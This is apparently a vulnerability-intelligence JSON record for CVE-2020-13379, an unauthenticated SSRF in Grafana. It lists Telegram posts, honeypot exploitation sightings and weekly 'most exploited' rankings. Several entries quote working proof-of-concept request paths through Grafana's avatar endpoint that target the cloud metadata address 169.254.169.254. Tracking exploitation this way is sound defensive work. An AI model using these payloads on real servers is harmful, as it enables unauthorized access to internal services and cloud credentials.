{"vulnerability": "CVE-2020-13379", "sightings": [{"uuid": "e58f8cfa-762c-4422-a355-4e83571e5a4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "published-proof-of-concept", "source": "Telegram/Uoa-03OsM6RXf0msSgaaKWDiagq8ZDgbKZrQ7CTvgTImxA", "content": "", "creation_timestamp": "2020-09-09T06:35:17.000000Z"}, {"uuid": "735ab90c-9e7b-4679-ad96-3672709740ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-09)", "content": "", "creation_timestamp": "2025-03-09T00:00:00.000000Z"}, {"uuid": "c9da99e6-f8d5-49f6-bfc0-9eb48ca8d970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "published-proof-of-concept", "source": "https://t.me/cKure/10284", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 CVE-2020-13379: Unauthenticated Full-Read SSRF in Grafana.\n\nhttps://rhynorater.github.io/CVE-2020-13379-Write-Up", "creation_timestamp": "2022-10-06T05:30:26.000000Z"}, {"uuid": "385478a7-0ec8-4b3d-9c39-2aa12f7d27c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-24)", "content": "", "creation_timestamp": "2025-03-24T00:00:00.000000Z"}, {"uuid": "b2e3fbf3-8129-411f-be04-dff6f2e7dfee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "published-proof-of-concept", "source": "https://t.me/cKure/1649", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 CVE-2020-13379: Unauthenticated SSRF in Grafana\n\nhttps://rhynorater.github.io/CVE-2020-13379-Write-Up\n\nPoC 1: avatar/tesdt%3Fd=http://redirect.rhynorater.com%25253f%253b%http://252fbp.blogspot.com%252f169.254.169.254\n\nPoC 2: \navatar/0%3fd%3dhttps%3A%252F%252F${BURPCOL}%25253A443%25253f%http://252Fimgur.com%252F", "creation_timestamp": "2020-08-03T04:31:10.000000Z"}, {"uuid": "18f3a2a7-501d-4dbf-958b-9959451e5e82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "published-proof-of-concept", "source": "https://t.me/infosec1z/47", "content": "\ud83d\udd30Top 10 vulnerabilities in 2020:\n\n 1. CVE-2020-12720: vBulletin SQL Injection (OWASP 1: Injection)\n\n 2. CVE-2020-5902: F5 BIG IP RCE and LFI (OWASP 1: Injection)\n\n\ud83c\udfa5 CVE PoC videos\n\nhttps://youtu.be/-ppzdYDk-ZM\n\nhttps://youtube.com/playlist?list=PLiVfOzljj-46iFcif16qMaPP84ZxCZ4Mb\n\n\n\n 3. CVE-2020-15506: MobileIron Core Authentication Bypass\n (OWASP 2: Broken Authentication)\n\n 4. CVE-2020-14882: Oracle WebLogic RCE (OWASP 1: Injection)\n\n 5. CVE-2020-14750: Oracle WebLogic RCE (OWASP 1: Injection)\n\n 6. CVE-2020-17530: Apache Struts 2 RCE (OWASP 1: Injection)\n\n\ud83c\udfa5 CVE PoC videos\n\nhttps://youtu.be/MUAAwijvAe8\n\n\n 7. CVE-2020-2551: Oracle WebLogic RCE (OWASP 1: Injection)\n\n 8. CVE-2020-13379: Grafana SSRF\n (OWASP 3: Broken Access Control)\n\n 9. CVE-2020-1147: Microsoft SharePoint Server RCE\n (OWASP 1: Injection)\n\n 10. CVE-2020-8209: Citrix XenMobile Server Path Traversal\n (OWASP 3: Broken Access Control)\n\n\n\u2796\u2796 @infosec1z \u2796\u2796", "creation_timestamp": "2021-09-05T16:58:17.000000Z"}, {"uuid": "87055aa1-0e42-43e6-b761-0f0bb9045bf7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/3104", "content": "#Analytics\n10 most exploited vulnerabilities of the week (April 5-11)\nCVE-2021-26855 - ProxyLogon MS Exchange Srv RCE\nhttps://t.me/cybersecuritytechnologies/2835\nCVE-2020-13379 - Unauth Full-Read SSRF in Grafana\nhttps://t.me/cybersecuritytechnologies/1515\nCVE-2021-24086 - Win IPv4/6 Stack RCE/DoS Vulns\nhttps://unit42.paloaltonetworks.com/cve-2021-24074-patch-tuesday\nCVE-2021-26411 - IE mshtml UAF\nhttps://t.me/cybersecuritytechnologies/2908\nCVE-2021-3129 - Laravel debug RCE\nhttps://t.me/cybersecuritytechnologies/2557\nCVE-2021-26708 - LPE in the Linux kernel &lt;5.10.x\nhttps://github.com/jordan9001/vsock_poc\nCVE-2020-16040 - V8 JIT Compiler Bug\nhttps://t.me/cybersecuritytechnologies/2450\nCVE-2021-21982 - SSRF in VMWare\nhttps://t.me/cybersecuritytechnologies/3039\nCVE-2021-21402 - UAF read in Jellyfin\nhttps://t.me/cybersecuritytechnologies/3064\nCVE-2021-29154 - BPF JIT bug\nhttps://www.openwall.com/lists/oss-security/2021/04/08/1", "creation_timestamp": "2021-04-12T11:01:12.000000Z"}, {"uuid": "2a71ccff-c108-492a-b6e3-5c22d0772f69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/4526", "content": "CVE-2020-13379\nUnauthenticated Full-Read SSRF in Grafana https://rhynorater.github.io/CVE-2020-13379-Write-Up", "creation_timestamp": "2020-08-01T19:07:21.000000Z"}, {"uuid": "1d046c07-529a-4735-8a66-93c893a1d366", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/3159", "content": "#Analytics\n10 most exploited vulnerabilities of the week (April 12-18)\nCVE-2020-13379 - Unauth Full-Read SSRF in Grafana\nhttps://t.me/cybersecuritytechnologies/1515\nCVE-2021-24086 - Win IPv4/6 Stack RCE/DoS Vulns\nhttps://unit42.paloaltonetworks.com/cve-2021-24074-patch-tuesday\nCVE-2021-1647 - MS Defender RCE Vulnerability\nhttps://www.anquanke.com/post/id/231625\nCVE-2021-28310 - Win32k Elevation of Privilege Vulnerability\nhttps://t.me/cybersecuritytechnologies/3124\nCVE-2021-24027 - Remote exploitation of a man-in-the-disk vulnerability in WhatsApp\nhttps://t.me/cybersecuritytechnologies/3126\nCVE-2021-28480/28481/28482/28483 - MS Exchange Server RCE Vulnerability\nhttps://www.tenable.com/blog/cve-2021-28480-cve-2021-28481-cve-2021-28482-cve-2021-28483-four-critical-microsoft-exchange\nCVE-2021-28316 - Windows WLAN AutoConfig Service Security Feature Bypass Vulnerability\nhttps://t.me/cybersecuritytechnologies/3156", "creation_timestamp": "2021-04-19T11:01:18.000000Z"}, {"uuid": "1c368812-4b15-4d82-9c2a-5c36b8525240", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/1515", "content": "#exploit\nCVE-2020-13379:\nUnauthenticated Full-Read SSRF in Grafana 3.0.1 - 7.0.1\nhttps://rhynorater.github.io/CVE-2020-13379-Write-Up\nPoC:\n/avatar/tesdt%3Fd=http://redirect.rhynorater.com%25253f%253b%http://252fbp.blogspot.com%252f169.254.169.254", "creation_timestamp": "2021-10-27T03:12:46.000000Z"}, {"uuid": "bbe51f93-838f-4bd1-b59d-7d455d7399bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-13379", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/3279", "content": "#Analytics\nTop 10 Most Used Vulnerabilities of the Month (April 1-30)\n\nCVE-2020-13379 - Unauth Full-Read SSRF in Grafana\nhttps://t.me/cybersecuritytechnologies/1515\nCVE-2021-24086 - Win IPv4/6 Stack RCE/DoS Vulns\nhttps://unit42.paloaltonetworks.com/cve-2021-24074-patch-tuesday\nCVE-2021-22893 Pulse SecureVPN RCE\nhttps://t.me/cybersecuritytechnologies/3185\nCVE-2021-28310 - Win32k EoP Vulnerability\nhttps://t.me/cybersecuritytechnologies/3124\nCVE-2021-26411 - IE mshtml UAF\nhttps://t.me/cybersecuritytechnologies/2908\nCVE-2021-22204 - DjVu improper neutralization of user data\nhttps://github.com/exiftool/exiftool/commit/cf0f4e7dcd024ca99615bfd1102a841a25dde031#diff-fa0d652d10dbcd246e6b1df16c1e992931d3bb717a7e36157596b76bdadb3800\nCVE-2021-24027 - Remote exploitation of a man-in-the-disk vulnerability in WhatsApp\nhttps://t.me/cybersecuritytechnologies/3126\nCVE-2021-28316 - Windows WLAN AutoConfig Service Security Feature Bypass Vulnerability\nhttps://t.me/cybersecuritytechnologies/3156\nCVE-2021-28480/28482 - MS Exchange Server RCE\nhttps://www.tenable.com/blog/cve-2021-28480-cve-2021-28481-cve-2021-28482-cve-2021-28483-four-critical-microsoft-exchange", "creation_timestamp": "2024-04-30T17:11:44.000000Z"}]}